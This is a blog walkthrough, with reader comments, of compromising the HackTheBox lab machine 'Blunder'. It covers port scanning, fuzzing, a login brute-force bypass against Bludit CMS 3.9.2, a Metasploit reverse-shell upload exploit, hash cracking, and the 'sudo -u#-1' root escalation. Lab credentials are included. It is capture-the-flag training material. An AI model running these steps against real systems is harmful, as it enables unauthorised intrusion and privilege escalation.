Blunder HackTheBox Walkthrough
This is Blunder HackTheBox machine walkthrough. In this walkthrough I will demonstrate you how I successfully exploited this machine and got root flag. Before starting let’s know something about Blunder machine. It is a Linux machine and is given difficulty level low by it’s maker with IP address 10.10.10.191.
Now I will show you step by step procedure how to get root flag in blunder machine.
First of all connect your PC with VPN so that you can get access to the lab and ping the IP 10.10.10.191 to make confirm that you are connected with blunder machine. I started by scanning the IP address 10.10.10.191, so that I could get some hint to start. Nmap, a port scanner gave the following results.
Scanning the Machine
$nmap -sC -sC -oN scan 10.10.10.191
Only two ports open??
Let’s perform full port scan in case there may be services running on some other ports which is not listed in nmap’s top 1000 ports.
After full port scan the same result appears.
$nmap -sC -sV -p- -oN full_scan 10.10.10.191
Tip: It is good idea to perform full port scan during CTF hunting or Penetration Testing because there may be chances that some ports are open which don’t come under top 1000 ports of nmap.
Port 21 and 80 is shown. Apache2 web server is running on port 80. After some enumeration found website is running on
Bludit CMS. And the version is
3.9.2 from this URL http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
As usual my next step is to search if any exploit is available for given CMS. Just googled
Bludit CMS 3.9.2 exploit and found this appropriate link. For more details google
CVE-2019-17240. Also searchsploit give this result.
There is a metasploit module present for Bludit. After opening this in metasploit I found it requires
Password. So we needed username and password to use this module
msf5>show info exploit/linux/http/bludit_upload_images_exec
Left it here and moved forward to find some other information. Used directory brute forcing using
dirsearch and wordlist
directory-list-2.3-small.txt, didn’t find any interesting file. Got some hint from HTB forum about txt file so tried to
FUZZ for hidden text files in the URL.
$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100
todo.txt. After reading the content at http://10.10.10.191/todo.txt it appears that
fergus is the user. Added it to my note. And started further enumeration.
Tip: It is a good idea to make notes of all interesting finding side by side because sometimes they show you the way how to proceed further.
Now we have got username and we need password. Let’s make our own wordlist using
cewl, a famous wordlist creator.
Creating Custom Wordlist
$cewl -d 3 -m 5 -w custom_wordlist.txt
Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as given below. In username use
fergus because we want to brute force on user fergus and in fname use the name of custom wordlist which you have created using cewl command. In my case it is
custom_wordlist.txt. Save it as
poc.py and run it
So we have the credentials
fergus : RolandDeschain . It’s time to exploit and get remote shell on our PC.
We have two ways to get shell.
1. Either use metasploit module or
2. Manually upload file to the website by logging in http://10.10.10.191/admin/ with creds fergus : RolandDeschain and intercept using Burp Suite to modify requests. For more info visit https://github.com/bludit/bludit/issues/1079 this link.
I preferred first because it don’t require much effort and you know well how lazy we are in doing things manually if automated things are present. 🙂
Try to use payload
php/meterpreter_reverse_tcp instead of payload
php/meterpreter/reverse_tcp if later failed to get you proper meterpreter shell
Getting User Shell
$ msfdb run
msf5 > search bludit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
meterpreter > sysinfo
Alright, we have got a meterpreter shell. Used
$shell command to upgrade it to system shell and further to fully qualified Linux shell
meterpreter > shell
$python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color
So we are in the Blunder HTB machine. Let us grab
user flag. Inside home directory two users
shaun are present. User flag is inside hugo folder. But
www-data don’t have permission to read it. Only hugo has permission to read it. Tried
$su hugo in case hugo and fergus have same password but login failed possibly due to incorrect password. To access user flag we have to login with hugo. After manual enumeration found a file
users.php inside the directory
Got password along with its salt
Now we have to crack this password. Hash identifier gave it is a
Identify Type of Hash
Tried to crack using
rockyou.txt wordlist but could not crack. So tried https://cmd5.com/ site and successfully cracked the hash.
The password is Password120. So the credential is
Hugo : Password120.
Switch user to hugo
Grab User Flag
Let’s check what special permission does hugo has.
Tip: Whenever you get a shell try to execute
$sudo -lcheck what special command [*] the current user can run. And try to google ‘how to escalate privilege using [*] command’. You may get your answer easily. For example, in this case google (ALL, !root) /bin/bash
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
(ALL, !root) /bin/bash got our privilege escalation vector in first link viz. vulnerable version of sudo. See this link.
After reading the exploit PoC we can easily get our root shell in just one command. Let’s do it
Getting Root Shell
$sudo -u#-1 /bin/bash
Give the password Password120
Grab Root Flag
Grab the root flag from root folder
This is how I got root to the blunder HackTheBox machine. Hope you guys have got something to learn from my approach. Have any issue and question please let me know at [email protected] and in comment section . Thanks for reading this walkthrough.
Want more walkthrough on HackTheBox always visit ethicalhacs.com.
This Post Has 10 Comments
Please post walkthroughs for other boxes too! your website is a great help when i’m stuck somewhere.
Thanks bro. I am working on it
hey Bro- I did pretty much everything only Password Hash cracking is giving problem because cmd5.com is chinese. I tried cmd5.org and many other sha1 decrypter but no luck. Any ideas?
Alternatively, you can get crackable hash at
[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
and try to crack the hash at crackstation.net
Hi this cracking procedure didn’t work I tried with crackstation and cmd5.com and was not cracked, I think that is something with the salt possition.
Could you please show us the format that you put in cmd5.com?.
Thanks and regards,
The format is sha1($Salt.$Pass) and this hash is not present on crackstation.net. There is also other hash present in
[email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php. This hash is without salt and can be cracked easily at crackstation.net
Hey! Thanks for the walkthrough. Can you please explain “sudo -u#-1 /bin/bash”. Or give any resources.
I have just taken this exploit from https://www.exploit-db.com/exploits/47502. For more info on Linux Privilege Escalation using Sudo Rights you can check out this link.
Hi, I am currently slightly stuck on on the meterpreter shell upgrade to system shell. I tried different payloads and still not able to proceed further. Only getting this:
meterpreter > shell
Process 2740 created.
Channel 0 created.
I think when a new channel is created means you have a shell session open and you can interact with this session using normal commands. You may either get a shell prompt or not after running shell command on meterpreter but normal Linux command should always works in a typical shell session created by meterpreter, which is in the above case. Try to run some basic Linux command like whoami, id, ls, etc. to confirm whether you are able to run command or not. If you get output from the command then use python -c ‘import pty;pty.spawn(“/bin/bash”)’ to upgrade the shell to shell prompt.